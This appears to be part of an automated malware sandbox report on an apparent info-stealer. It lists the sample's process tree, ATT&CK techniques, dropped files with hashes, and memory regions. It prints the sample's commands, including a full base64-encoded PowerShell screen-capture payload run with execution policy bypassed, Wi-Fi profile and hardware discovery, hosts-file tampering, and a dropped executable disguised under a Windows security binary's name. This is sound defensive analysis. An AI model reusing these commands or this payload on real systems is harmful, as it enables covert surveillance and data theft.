- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5572
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:5632
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:5692
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:5712
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:5728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  PID:5764
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2cuxggyt\2cuxggyt.cmdline"
    3⤵
    PID:5884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8604.tmp" "c:\Users\Admin\AppData\Local\Temp\2cuxggyt\CSCEA779E01E42E46F38F9FE7142828482.TMP"
      4⤵
      PID:5920

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9af507866fb23dace6259791c377531f

SHA1
5a5914fc48341ac112bfcd71b946fc0b2619f933

SHA256
5fb3ec65ce1e6f47694e56a07c63e3b8af9876d80387a71f1917deae690d069f

SHA512
c58c963ecd2c53f0c427f91dc41d9b2a9b766f2e04d7dae5236cb3c769d1f048e4a342ea75e4a690f3a207baa1d3add672160c1f317abfe703fd1d2216b1baf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b0177afa818e013394b36a04cb111278

SHA1
dbc5c47e7a7df24259d67edf5fbbfa1b1fae3fe5

SHA256
ffc2c53bfd37576b435309c750a5b81580a076c83019d34172f6635ff20c2a9d

SHA512
d3b9e3a0a99f191edcf33f3658abd3c88afbb12d7b14d3b421b72b74d551b64d2a13d07db94c90b85606198ee6c9e52072e1017f8c8c6144c03acf509793a9db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
f1e1fd5dbd761a0bc22465a477d3f00e

SHA1
26b2155538a42d69c1d3ff5c6f33166d8da45980

SHA256
a06c5417145b735a81bbae83462cd6cc2502d7f0ca138a540b5094dcbf64d21f

SHA512
e01ae2cdd07018515c8352f432d34ce899111c14c97d02ec1924ac7ff00475befa6258ceb4d04bd61467d3ce5835318b154139c9195f726e2ac68a6073824a82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
140KB

MD5
9dcf98f8fa256b24ff1d19b421e1bbbb

SHA1
96f87c0dc92632717ac02abfbc06c768d8d33857

SHA256
c9c4a604d81e8500fa1e7a24b1a63109b0496107156943425d1488eecefa3b35

SHA512
b3e98590069883f3704b50fd990b3b856b000affb8c80ec9c01fca7ea1c703bc43816eb72b2d750ff3a684e49d1be2fce888dfaef4c83f0c41a481eef720b238

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
4KB

MD5
214ca155fdabeda8d2863e9b6187a58e

SHA1
c32e6aad03d391b0700826411ba088567bb803ce

SHA256
6f3381c4d048a4c2a55a819cb122ce685c09018f20316c3b72c623ead803aafa

SHA512
804ec91f2f38e0820e88f833ec436e763d80d3d9bf7aeab6663feade667fba64c9b1890ff8f95c444b71402116c1e188d4960e72b34be83efdee5bd53f453600

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
9KB

MD5
c346c3dbc3d94d05c3b24dad2e22ecf8

SHA1
ce6526889ffb035ab8e6be8566b0b00f5e0689ac

SHA256
9962671f9accfae696092eef79c754ae14ed5f96de0c1aac66b46b14be42c124

SHA512
51deb573486cdb544a53176e1ce26c468ec05e98b99b8ce1371c6ff45065404ceefe7041bcb58dfd48e12669cb2d2173159342642257800bd8737aa46a891924

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
9KB

MD5
4797bf20abe1e617d3019165e7ee6a5f

SHA1
dc3ddb2bde77e939b1e8da5c11c96dae63cf10a9

SHA256
5d8a0c317045583ef608b7a16a38ab0c21349e8918253e0afaf46d6499ec6fdd

SHA512
1c3cfec7114f7fa02b854c00966589fc2f528c232b4022dac04f8dcbf33de5f30b14c246cdc0216deecb92375d845c0a995878cda22e1a4849c0e29dddbdc728

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
13d25490ea4d67864184b0805af972d2

SHA1
f03ef0777884fb22a4fd8a743811d3933197553f

SHA256
c12b6a3d075d60cc102b3bdf7233b1bc8d01e214d63a4ec392ae28659efcaf45

SHA512
7368c70468dfe71941176a4e9036bf887551238289bd2417a0359a19d3dc6ab4e173aee15b796e2f768a8a3010e33ad5ab1d0fc0e866504599b4f3a272b04927

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
3af582c06c4b84fb6bb663a4bbd7bbcb

SHA1
039d7401691606329b4bf44c38e67c9a9503bf1f

SHA256
b004c7816e8a0f2c91caaebfc88a8af87c205a3474198b6f1d38dd57da0009d5

SHA512
72b47ee5212a523bcc32f0982fe321e71e2d32aafb4205cd8a3b5735a78dedb4f66adc03cf5827d09c140dcc787608e5855feadb378c0ae3ff8bccd6ffa6f01b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
23894ef85005af145d8b0e2c9c09ba97

SHA1
336beaace32380bdf301278a3b99e699c84c50b9

SHA256
3bfa8a28a61499c3ef48e894257dd5e461492ec5b67f4d75daccbd2c0a09f582

SHA512
7b9d77e684584e66030b0b16c7ca0019e379d83b28b0f8fbc8a15d9169ad71deff16d46e12cebe690fa3090b5d933b9475e2076b6fc76e9cb01b85572bb50477

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
e7da38211ca387f4a1d049845fe64aed

SHA1
902aba52e9161a8a4bf2f66526f9ecf87363a448

SHA256
3f4c92e9aa0f9d01f0ee11741d939b74a894eca61942b2dc045b4bb58f8187f0

SHA512
d20f141a851ea09a9981dd692149de169a028e5d965869bf946c0d7e5bba4eed8f86bd550b6ac512112b7b3c9f75c0907ecbec1afdf6cbbe86356ebf86b0d303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
2383fbc5a0b534a833979939595db17c

SHA1
f2fcb0c6ac1938518f53a0230cb36092c08b73db

SHA256
86b987de8e64e5a1e6efda582d4f28ecf297af8bd82365a0c055c1254ff50034

SHA512
809a5e28893d9c37f3408bde61bda63c5cb55cc5f750d7fe1045924d145f316bb7d924e48ea7b7ed60056f23e14b28182f4d2e76d3df2d9800812bb6f483f77b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58436d.TMP

Filesize
2KB

MD5
7ac42888d7beaf2548404d3c50a858e1

SHA1
8ecc4eea450a9360b4567340a2873f9a65cdb0f2

SHA256
42b9f20b5019507096d6cb0bf76bbc1e49c2654e82e0353bd3bfbd924abab87a

SHA512
416e0672218fc7f495600a46ecae1e999b494c0eb928177c542064dec04f96928aa3a3b071dae3e429a102e7db75b38861d52738809a69be1437a30cbfb62f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
91fcce5e387064403b1ef307aeccd7f2

SHA1
0e27468bc4fa5697ea91f3dd5a5e08678a8b7f7b

SHA256
630aa467c89d8f677a671b91f04ae80eb0b17fc53e13c2b8296805298207ab93

SHA512
98a103604788a24389b2066763dbd62c80f945cb633b0e47c3bfe2b2a4013b0957cb3b2c06c4521c62effd091a68c108ed696c528a01f9cc4dd76176e3ac6120

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
375b62dea08c2557931f008e5869444c

SHA1
115d884a5113e7e4bdb94f0b78d5a12985fc7227

SHA256
de5f9f0efe575e755f241ea0af4301ac0da6415206381024666e4b6e06498f92

SHA512
a288f445d1e346e810da3ff95a137aa76b05e3a425b7dd0b16cec93635b03250de0d20b9c3c825b4aa55a46d11fa7ab8733c2adc0080dc708d2b18123125dab9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4fefe53e1ddc2ed67993ad7fc7782015

SHA1
47a064c81ab4c03ad48ab19072d69de7a77a5edf

SHA256
20d5c9b6722825a30bc056764e07956f5d2f670ff99b6b737a4e286570ee0ac0

SHA512
5eaf470b704b3676ce064d0cb0d5bb750dccf81f797dafba7fa7a84c7d0ec341b3b9131a8b64cc4209b84040b627e48ad963c3088ae15b6b8ca56895cf9abff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
eb6bbad04121efc4b28aafcfb2098c9b

SHA1
874882a3749c41301505e95510f761491c465073

SHA256
bdd1eb4ef60661fd7570aa4f6454ffe1072f57d213dd7263f89dafceee0e5bd5

SHA512
7ade89430b42f124403449f4b8146ea4daad3bf87a53fe6aacdb28d759ad759ad6ea88db61723c1fa9c728d0d3c7aafa13527d15cf7149abbb4fa4fb4eb459d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2cuxggyt\2cuxggyt.dll

Filesize
4KB

MD5
7c0ca543a424d3315d9d3310d912b076

SHA1
12c828c0f86a7e85f21ae005fd8c1496ca6dcba0

SHA256
9a9d5a196db8ad70c8b39ee640aa593f97957c5bbe646a5e67730732970e487b

SHA512
e61c46ab9c38b585bf95fd14cae7fb3773645b6fdd790443197c8832d9097b77c08e06b34413dba94a9f23ccbe0bb2b22a5dac8c85c4ebb5504cbb4594f7629e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8604.tmp

Filesize
1KB

MD5
f2b2d47e895761a81a5da2c69f14f8a0

SHA1
42b7310c6ce876e23429c9a4e37356cce3c4424f

SHA256
de999dbb01f4fefbdf902c9c22d9da12137d7b9136383276496b2a6fffed1add

SHA512
2ce7cc4d5564ebbe9e5935a7d9c9bd4a4ace23c4be45ba7cde7d233476ad4d09e89bff224a6d104ec9c3aba1050f5441e9bfe5bfc21fe43a36b0dbab106a6b3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fvrxbrwn.lnr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\browsers-temp\Admin\Edge\Default\history.txt

Filesize
7KB

MD5
bcc968762b77d87482f45b64bd3f76b5

SHA1
281dc0c668a9f26749fe6dcd19365f63fe34d2a2

SHA256
e57b546710dc37102272a7d9ea11833ea931abcfa4bf33810f0a15ec9e826d06

SHA512
a5757e96bdbc719ab806d920c7f7db7a3388f3e867d6455602d0a1d233dc5aef40c2d25a5dd1a7e7f219805566f19328c2791803e16bded092cae56649364c50

Download Submit
C:\Users\Admin\AppData\Local\Temp\jFjFNyPc9w\Display (1).png

Filesize
106KB

MD5
9359148b121d620a1e64cd515fdae406

SHA1
f9252d864bbf62568fe42ae264d5c24bb4087016

SHA256
5962b75f97072459a8c86a2f346721582a62cade7497800a9085227e18fc0e92

SHA512
0688c355223634efd7e4a5063e778aff1507b39ff34008d1c454483c5aac06a82265e07a891068e62b611d08499922696e4ed5b3d66271916cd1f38ddff623df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
14.2MB

MD5
5b9609530e3cb2dd1b86c43ebf4f9b25

SHA1
60a9327fcb847b169d099c5a289223c2a3043560

SHA256
3dbe2990bff79285935c181637d693c07e058837840aafe0b8c4d8eaac854ed1

SHA512
b2c3c0b9f9b7b1f5360c5c75258f5116b2e88642c884bb90f8d79c502cbb07ce0b58497fafcf3b972c52b19d97571a50777dd198fc5d377e2c373c72d23b0b50

Download Submit
C:\Users\Admin\Downloads\slinky (4).zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cuxggyt\2cuxggyt.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cuxggyt\2cuxggyt.cmdline

Filesize
607B

MD5
c353a2d576d6eb493f6071db85c67cc9

SHA1
54543ca19a942d1c0199e92687ceddb59c0b4072

SHA256
73a0a2cd7ddf29b07452fe6f185a0ba1efc689c7165532c99417b1b6fd2aa050

SHA512
0bb1da1044650151d0ae0d54639080281f1df3bd3065dab433f16dd70d1993c1574b85ade05c176aa6de59a001d7f199a1a279359c21d249f01bb995f14e9aa5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2cuxggyt\CSCEA779E01E42E46F38F9FE7142828482.TMP

Filesize
652B

MD5
851e2ccb6ad6cf15eea7271b5645b146

SHA1
0574c678912258c084cc6603a6d826f34df445b3

SHA256
2a7709af26f5f1c06eec000411faf4fe12c53d5247f34fcaffd0c259d4e1a4fd

SHA512
1f097855774d9f95c5a37af6ffb6b77320c3f0ff832d7be350575b46228a2a049b8c33edcd8f7590ac576ceda9bf680a214de966c3ceef5aca3df2b192b3b222

Download Submit
\??\pipe\LOCAL\crashpad_4216_XJUZANZLROYSETRR

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/5160-315-0x0000026DBA060000-0x0000026DBA082000-memory.dmp

Filesize
136KB

Download
memory/5764-384-0x0000020830980000-0x0000020830988000-memory.dmp

Filesize
32KB

Download
memory/5884-382-0x000001D8FCD00000-0x000001D8FD7C2000-memory.dmp

Filesize
10.8MB

Download